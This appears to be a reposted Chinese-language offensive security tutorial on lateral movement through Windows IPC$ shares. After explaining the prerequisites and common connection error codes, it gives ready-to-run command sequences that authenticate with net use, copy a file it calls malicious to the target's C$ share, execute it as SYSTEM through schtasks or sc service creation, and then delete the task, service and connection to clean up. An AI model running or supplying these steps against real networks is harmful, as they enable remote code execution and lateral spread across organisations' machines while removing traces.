IPC橫向移動

IPC橫向移動
- 一、IPC介紹
- 二、IPC利用條件
- 三、IPC連接失敗原因
- 四、IPC連接常見錯誤
- 五、IPC配合計劃任務橫向移動
- 六、IPC配合系統服務橫向移動

一、IPC介紹

IPC( Internet Process Connection)共享“命名管道”的資源，是為了實作行程間通信而開放的命名管道，IPC可以通過驗證用戶名和密碼獲得相應的權限，通常在遠程管理計算機和查看計算機的共享資源時使用，

通過ipc$，可以與目標機器建立連接，利用這個連接，不僅可以訪問目標機器中的檔案，進行上傳、下載等操作，還可以在目標機器上運行其他命令，以獲取目標機器的目錄結構、用戶串列等資訊，

二、IPC利用條件

1、開啟了139、445埠

ipc可以實作遠程登錄及對默認共享資源的訪問，而139埠的開啟表示NetBIOS協議的應用，通過139、445( Windows2000)埠，可以實作對共享檔案列印機的訪問，因此，一般來講，ipc連接需要139、445埠的支持，

2、管理員開啟了默認共享

默認共享是為了方便管理員進行遠程管理而默認開啟的，包括所有的邏輯盤(c$、d$、e$等和系統目錄 winnt或 windows( adminS)通過ipc$，可以實作對這些默認共享目錄的訪問，

三、IPC連接失敗原因

1、用戶名或密碼錯誤

2、目標沒有打開ipc默認共享

3、不能成功連接目標的139、445埠

四、IPC連接常見錯誤

錯誤號5:拒絕訪問
錯誤號51:Windows無法找到網路路徑，即網路中存在問題，
錯誤號53:找不到網路路徑，包括IP地址錯誤、目標未開機、目標的lanmanserver服務未啟動目標有防火
墻(埠過濾)
錯誤號67:找不到網路名，包括lanmanworkstation服務未啟動、ipcs已被洗掉
錯誤號1219:提供的憑據與已存在的憑據集沖突，例如,已經和目標建立了ipcs，需要在洗掉原連接后重新進
行連接，
錯誤號1326:未知的用戶名或錯誤的密碼
錯誤號l792：試圖登錄，但是網路登錄服務沒有啟動，包括目標NetLogon服務未啟動(連接域控制器時會出
現此情況)，
錯誤號2242:此用戶的密碼已經過期，例如：目標機器設定了賬號管理策略，強制用戶定期修改密碼，

五、IPC配合計劃任務橫向移動

1、建立IPC連接

net use \\192.168.142.10\ipc$ "密碼" /user:賬戶

2、復制惡意檔案

shell copy C:\Users\Administrator\Desktop\can.exe \\192.168.142.10\c$\Users\Administrator\Desktop

3、創建計劃任務

schtasks /create /s IP地址 /tn 計劃任務名 /sc onstart /tr c:\檔案 /ru system /f

shell schtasks /create /u administrator /p admin@123 /s 192.168.142.10 /tn can /sc onstart /tr C:\Users\Administrator\Desktop\can.exe /ru system /f

4、執行計劃任務

schtasks /run /s IP地址 /i /tn "計劃任務名"

shell schtasks /run /u administrator /p admin@123 /s 192.168.142.10 /i /tn "can"

5、洗掉計劃任務

schtasks /delete /s IP地址 /tn "計劃任務名" /f

shell schtasks /delete /u administrator /p admin@123 /s 192.168.142.10 /tn "can" /f

6、清除IPC連接

net use \\IP /del /y

shell net use \\192.168.142.10 /del /y

六、IPC配合系統服務橫向移動

1、建立IPC連接

net use \\192.168.142.10\ipc$ "密碼" /user:賬戶

2、復制惡意檔案

shell copy C:\Users\Administrator\Desktop\can.exe \\192.168.142.10\c$\Users\Administrator\Desktop

3、創建服務

shell sc \\192.168.142.10 create can binpath= "cmd.exe /c C:\Users\Administrator\Desktop\can.exe"

4、開啟服務

shell sc \\192.168.142.10 start can

5、洗掉服務

shell sc \\192.168.142.10 delete can

轉載請註明出處，本文鏈接：https://www.uj5u.com/qita/554226.html

標籤：其他

上一篇：利用遠控工具橫向移動

下一篇：返回列表